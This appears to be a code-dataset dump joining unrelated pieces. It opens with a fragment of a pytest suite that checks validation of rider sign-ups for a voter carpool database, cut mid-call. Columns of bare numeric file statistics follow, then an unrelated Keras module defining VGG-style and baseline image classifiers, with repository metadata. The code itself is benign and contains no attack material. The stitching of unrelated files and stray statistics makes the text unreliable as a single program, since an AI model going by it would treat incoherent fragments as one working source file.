%(RiderCollectionZIP)s,
%(RiderDropOffZIP)s,
%(AvailableRideTimesLocal)s,
%(TotalPartySize)s,
%(TwoWayTripNeeded)s,
%(RiderIsVulnerable)s,
%(RiderWillNotTalkPolitics)s,
%(PleaseStayInTouch)s,
%(NeedWheelchair)s,
%(RiderPreferredContact)s,
%(RiderAccommodationNotes)s,
%(RiderLegalConsent)s,
%(RiderWillBeSafe)s,
%(RiderCollectionAddress)s,
%(RiderDestinationAddress)s
)
""", args)
results=cursor.fetchone()
conn.commit()
return {'uuid' : results[0], 'error_code' : results[1], 'error_text' : results[2]}
def test_insert_rider_000_all_valid(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
cursor = pgdbConn.cursor()
cursor.execute("""SELECT status FROM carpoolvote.rider WHERE "UUID"=%(uuid)s """, {'uuid' : uuid})
results = cursor.fetchone()
assert results[0] == 'Pending'
def test_insert_rider_001_IPAddress_invalid(pgdbConn):
args = {
'IPAddress' : 'abcd',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_002_RiderCollectionZIP_invalid_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_003_RiderCollectionZIP_invalid_not_exists(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '00000',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_004_RiderCollectionZIP_invalid_not_number(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : 'abcd',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_005_RiderDropOffZIP_invalid_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_006_RiderDropOffZIP_invalid_not_found(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '00000',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_007_RiderDropOffZIP_invalid_not_number(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : 'abcd',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_008_AvailableRideTimesLocal_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_009_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_010_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_011_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_012_AvailableRideTimesLocal_invalid_chronology(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T03:00/2018-10-01T02:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_013_AvailableRideTimesLocal_invalid_past(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2000-10-01T02:00/2000-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_014_TotalPartySize_invalid_zero(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '0',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_015_TotalPartySize_invalid_negative(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '-10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_016_RiderPreferredContact_valid_SMS(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'SMS',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
def test_insert_rider_017_RiderPreferredContact_valid_Email(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
def test_insert_rider_018_RiderPreferredContact_valid_Phone(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Phone',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
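# A sketch of a helper that could collapse the repeated result-checking pattern in the
# tests above; the expected error codes and result fields mirror what the tests already
# assert, and the helper name itself is illustrative rather than part of the suite.
def assert_rider_insert(pgdbConn, args, expect_success):
    results = generic_rider_insert(pgdbConn, args)
    if expect_success:
        # valid inserts return a uuid and no error
        assert results['error_code'] == 0
        assert len(results['error_text']) == 0
        assert len(results['uuid']) > 0
    else:
        # rejected inserts return error_code 2, an error message, and no uuid
        assert results['error_code'] == 2
        assert len(results['error_text']) > 0
        assert len(results['uuid']) == 0
    pgdbConn.commit()
    return results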
| 33.735007
| 106
| 0.600339
| 2,175
| 24,188
| 6.550805
| 0.054713
| 0.036637
| 0.019582
| 0.024003
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0
| 0.073384
| 0.254093
| 24,188
| 716
| 107
| 33.782123
| 0.716329
| 0
| 0
| 0.854864
| 0
| 0.020734
| 0.444105
| 0.159501
| 0
| 0
| 0
| 0
| 0.092504
| 1
| 0.033493
| false
| 0
| 0.00319
| 0.001595
| 0.039872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb94e576ddf818945339ae70a9b555a6796cd185
| 6,583
|
py
|
Python
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | 1
|
2022-01-17T05:01:50.000Z
|
2022-01-17T05:01:50.000Z
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | 4
|
2021-06-08T21:56:35.000Z
|
2022-03-12T00:38:38.000Z
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | null | null | null |
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D, BatchNormalization, ReLU
def add_conv(model, filters, dropout, batch_norm):
"""
Adds a convolution layer with optional dropout and batch normalization to the model.
Args:
model (Sequential): object with model structure
filters (int): number of filters
dropout (bool): if True, adds dropout
batch_norm (bool): if True, adds batch normalization
"""
model.add(Conv2D(filters, 3, padding='same', activation=None))
if batch_norm: model.add(BatchNormalization())
model.add(ReLU())
if dropout: model.add(Dropout(0.25))
def generate_model(conf):
"""
Initializes model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
Raises:
KeyError: if there is no 'arch' key in the configuration dict
ValueError: if the 'arch' parameter does not match a known model structure
"""
if 'arch' not in conf:
raise KeyError('Missing "arch" in config.')
if conf['arch'] == 'vgg_v1':
return get_vgg_v1(conf)
if conf['arch'] == 'vgg_v2':
return get_vgg_v2(conf)
if conf['arch'] == 'baseline':
return get_baseline(conf)
raise ValueError('Unknown value for "arch" in config: '+conf['arch'])
def get_vgg_v1(conf):
"""
Generates an object with the predefined VGG model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(32, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
add_conv(model, 32, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(512, activation=None))
if conf['dropout']: model.add(Dropout(0.25))
model.add(ReLU())
if conf['batch_norm']: model.add(BatchNormalization())
model.add(Dense(3, activation='softmax'))
return model
def get_vgg_v2(conf):
"""
Generates an object with the predefined larger VGG model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(64, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(512, activation=None))
if conf['dropout']: model.add(Dropout(0.25))
model.add(ReLU())
if conf['batch_norm']: model.add(BatchNormalization())
model.add(Dense(3, activation='softmax'))
return model
def get_baseline(conf):
"""
Generates an object with the predefined baseline model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(16, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 32, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(3, activation='softmax'))
return model
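# A minimal usage sketch: the configuration keys below ('arch', 'height', 'width',
# 'dropout', 'batch_norm') are exactly the ones the functions above read; the
# optimizer, loss, and image size are assumptions chosen only for illustration.
if __name__ == '__main__':
    conf = {'arch': 'baseline', 'height': 64, 'width': 64,
            'dropout': True, 'batch_norm': True}
    model = generate_model(conf)
    model.compile(optimizer='adam',
                  loss='categorical_crossentropy',
                  metrics=['accuracy'])
    model.summary()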
| 34.465969
| 109
| 0.64621
| 878
| 6,583
| 4.73918
| 0.109339
| 0.105744
| 0.106224
| 0.12497
| 0.821677
| 0.791637
| 0.776256
| 0.776256
| 0.769286
| 0.75751
| 0
| 0.038721
| 0.187908
| 6,583
| 190
| 110
| 34.647368
| 0.739618
| 0.165122
| 0
| 0.786408
| 0
| 0
| 0.143157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048544
| false
| 0
| 0.019417
| 0
| 0.126214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
